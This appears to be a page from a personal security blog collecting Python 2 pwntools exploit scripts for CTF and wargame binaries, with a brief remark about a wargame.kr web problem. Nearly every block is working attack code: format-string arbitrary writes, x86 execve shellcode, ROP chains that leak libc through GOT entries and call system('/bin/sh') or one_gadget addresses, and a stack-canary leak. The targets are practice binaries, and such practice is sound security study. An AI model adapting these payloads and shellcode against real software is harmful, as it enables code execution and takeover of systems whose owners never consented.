1000 posts in 'All categories'

exploit.py

# Python 2 / pwntools
from pwn import *

p = process("./ebp")
e = ELF('./ebp')

# first format-string write (%4$n), width taken from the fgets GOT entry
payload = "%{0}p%4$n".format(e.got['fgets'])
p.sendline(payload)
p.recv(2048)

# second format-string write (%12$n), followed by a NOP sled and the shellcode
bufAddr = 0x0804A080
payload2 = "%{0}p%12$n".format(bufAddr + 30)
payload2 += "\x90" * 100
payload2 += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"
p.sendline(payload2)
p.recv(2048)

p.interactive()


JeonYoungSin

A space for keeping notes


PHP SoapClient SSRF

2019. 8. 6. 20:20


exploit.py

# Python 2 / pwntools
from pwn import *

# walk the menu once per candidate offset and read back one %<i>$s probe
for i in range(0, 100):
    try:
        p = process("./life_game")
        p.sendlineafter("6. escape\n-----------------------\n", "5")
        p.sendlineafter("5. go back\n-----------------------\n", "3")
        p.sendlineafter("How much?\n", "-10000000")
        p.sendlineafter("5. go back\n-----------------------\n", "5")
        p.sendlineafter("6. escape\n-----------------------\n", "2")
        p.sendlineafter("6. escape\n-----------------------\n", "2")
        p.sendlineafter("6. escape\n-----------------------\n", "2")
        p.sendlineafter("6. escape\n-----------------------\n", "2")
        p.sendlineafter("6. escape\n-----------------------\n", "4")
        p.sendlineafter("6. escape\n-----------------------\n", "5")
        p.sendlineafter("5. go back\n-----------------------\n", "3")
        p.sendlineafter("How much?\n", "1000000")
        p.sendlineafter("5. go back\n-----------------------\n", "5")
        p.sendlineafter("6. escape\n-----------------------\n", "31337")
        p.sendlineafter("The last one\n", "%" + str(i) + "$s")
        print p.recv()
        p.close()
    except:
        print "fail"
        p.close()



exploit.py

# Python 2 / pwntools
from pwn import *

# try one %<i>$s probe per process until the flag string shows up in the echo
for i in range(1, 100):
    try:
        p = process("./echo")
        payload = "%" + str(i) + "$s"
        p.sendlineafter("> ", payload)
        result = p.recv(2048)
        if "picoCTF" in result:
            print result
            break
        p.close()
    except:
        print "fail"
        p.close()



exploit.py

# Python 2 / pwntools
from pwn import *

p = process("./vuln")
e = ELF("./vuln")
l = e.libc

p.sendlineafter(">>", "3")

pr = 0x0804884b        # pop ; ret
restart = 0x80486E0    # address returned to after the leak

# stage 1: leak the puts GOT entry with puts(), then return to restart
payload = "A" * (0x40 + 4)
payload += p32(e.plt['puts'])
payload += p32(pr)
payload += p32(e.got['puts'])
payload += p32(restart)

p.sendlineafter("plz!\n", payload)
p.recvuntil("Good bye~~!\n")
puts_addr = u32(p.recv(4))

libc_base = puts_addr - l.symbols['puts']
one_gadget = [0x3d0d5, 0x3d0d5, 0x3d0d9, 0x3d0e0, 0x67a7f, 0x67a80, 0x137e5e, 0x137e5f]
one_addr = libc_base + one_gadget[0]

# stage 2: overwrite the return address with the one_gadget address
payload2 = "A" * (0x40 + 4)
payload2 += p32(one_addr)
p.sendlineafter("plz", payload2)
p.interactive()



speedrun1_exploit.py

# Python 2 / pwntools
from pwn import *

p = process("./vuln")
e = ELF('./vuln')

syscall = 0x474e65
pop_eax = 0x415664
pop_rdi = 0x400686
pop_rsi = 0x4101f3
pop_rdx = 0x4498b5
binsh = "/bin/sh\x00"

payload = "A" * 0x400
payload += "B" * 8

# read(0, bss, len(binsh))
payload += p64(pop_eax)
payload += p64(0)
payload += p64(pop_rdi)
payload += p64(0)
payload += p64(pop_rsi)
payload += p64(e.bss())
payload += p64(pop_rdx)
payload += p64(len(binsh))
payload += p64(syscall)

# execve(bss, 0, 0)
payload += p64(pop_eax)
payload += p64(59)
payload += p64(pop_rdi)
payload += p64(e.bss())
payload += p64(pop_rsi)
payload += p64(0)
payload += p64(pop_rdx)
payload += p64(0)
payload += p64(syscall)

p.sendlineafter("words?\n", payload)
sleep(0.1)
p.send(binsh)
p.interactive()



speedrun2_exploit.py

# Python 2 / pwntools
from pwn import *

p = process("./vuln")
e = ELF('./vuln')
l = e.libc

p.sendlineafter("now?\n", "Everything intelligent is so boring.")

pr = 0x4008a3    # pop rdi ; ret

# stage 1: puts(puts@got) to leak libc, then return to 0x40074C
payload = "A" * (0x400 + 8)
payload += p64(pr)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(0x40074C)

p.sendlineafter("more.\n", payload)
print p.recvuntil("Fascinating.\n")
puts_addr = u64(p.recv(6).ljust(8, "\x00"))

libc_base = puts_addr - l.symbols['puts']
one_addr = libc_base + 0x10a38c

p.sendlineafter("now?\n", "Everything intelligent is so boring.")

# stage 2: return into the one_gadget address
payload2 = "A" * (0x400 + 8)
payload2 += p64(one_addr)

print p.sendlineafter("more.\n", payload2)
sleep(0.1)
p.interactive()



babyrop1_exploit.py

# Python 2 / pwntools
from pwn import *

p = process("./babyrop1")

system = 0x400490
binsh = 0x601048
pr = 0x400683     # pop rdi ; ret
ret = 0x400479    # ret, for stack alignment

payload = "A" * (0x10 + 8)
payload += p64(pr)
payload += p64(binsh)
payload += p64(ret)
payload += p64(system)

p.sendlineafter("? ", payload)
p.interactive()



babyrop2_exploit.py

# Python 2 / pwntools
from pwn import *

p = process("./babyrop2")
e = ELF("./babyrop2")
l = e.libc

pr = 0x400733     # pop rdi ; ret
ret = 0x4004d1    # ret, for stack alignment
one_gadget = [0x4f2c5, 0x4f322, 0x10a38c]

# stage 1: printf(read@got) to leak libc, then return to 0x400636
payload = "A" * (0x20 + 8)
payload += p64(pr)
payload += p64(e.got["read"])
payload += p64(ret)
payload += p64(e.plt['printf'])
payload += p64(ret)
payload += p64(0x400636)

p.sendlineafter("? ", payload)
p.recvuntil("!\n")
read_addr = u64(p.recv(6).ljust(8, "\x00"))

libc_base = read_addr - l.symbols['read']
system_addr = libc_base + l.symbols['system']
binsh = libc_base + list(l.search("/bin/sh"))[0]

# stage 2: system("/bin/sh")
payload2 = "A" * (0x20 + 8)
payload2 += p64(ret)
payload2 += p64(pr)
payload2 += p64(binsh)
payload2 += p64(system_addr)

p.recvuntil("? ")
p.sendline(payload2)
p.interactive()



After about a year I logged back into wargame.kr and found that around 7 new problems had been added.

There was exactly one web problem among the new ones, so I took a look at it. It was a lot of fun to solve, and even though I had to go to work I ended up staying up almost all night.

I was going to post a writeup, but perhaps because the problem is new there are no public writeups at all and the solver count seems low, so I'll post what I wrote up later once some writeups have come out.



exploit.py

# Python 2 / pwntools
from pwn import *

p = process("./start")
e = ELF("./start")

# stage 1: overflow up to the canary so it is printed back, then read it
payload = "A" * (0x20 - 12)
payload += "B" * 4

p.sendline(payload)
print p.recvuntil("\n")
canary = "\x00" + p.recv(7)
print p.recv()
sleep(0.2)

pop_rax_rdx_rbx = 0x47a6e6
pop_rdi = 0x4005d5
pop_rsi = 0x4017f7
pop_rdx = 0x443776
syscall = 0x4003fc
binsh = "/bin/sh\x00"

read = 0x440300

# stage 2: ROP chain with the leaked canary in place
payload2 = "A" * (0x20 - 8)
payload2 += canary
payload2 += "C" * 8

# read(0, bss, len(binsh))
payload2 += p64(pop_rdi)
payload2 += p64(0)
payload2 += p64(pop_rsi)
payload2 += p64(e.bss())
payload2 += p64(pop_rdx)
payload2 += p64(len(binsh))
payload2 += p64(read)

# execve(bss, 0, 0)
payload2 += p64(pop_rax_rdx_rbx)
payload2 += p64(59)
payload2 += p64(0)
payload2 += p64(0)
payload2 += p64(pop_rsi)
payload2 += p64(0)
payload2 += p64(pop_rdi)
payload2 += p64(e.bss())
payload2 += p64(syscall)

p.sendline(payload2)

print p.recv()
sleep(0.2)
p.sendline("exit")
p.send(binsh)
p.interactive()

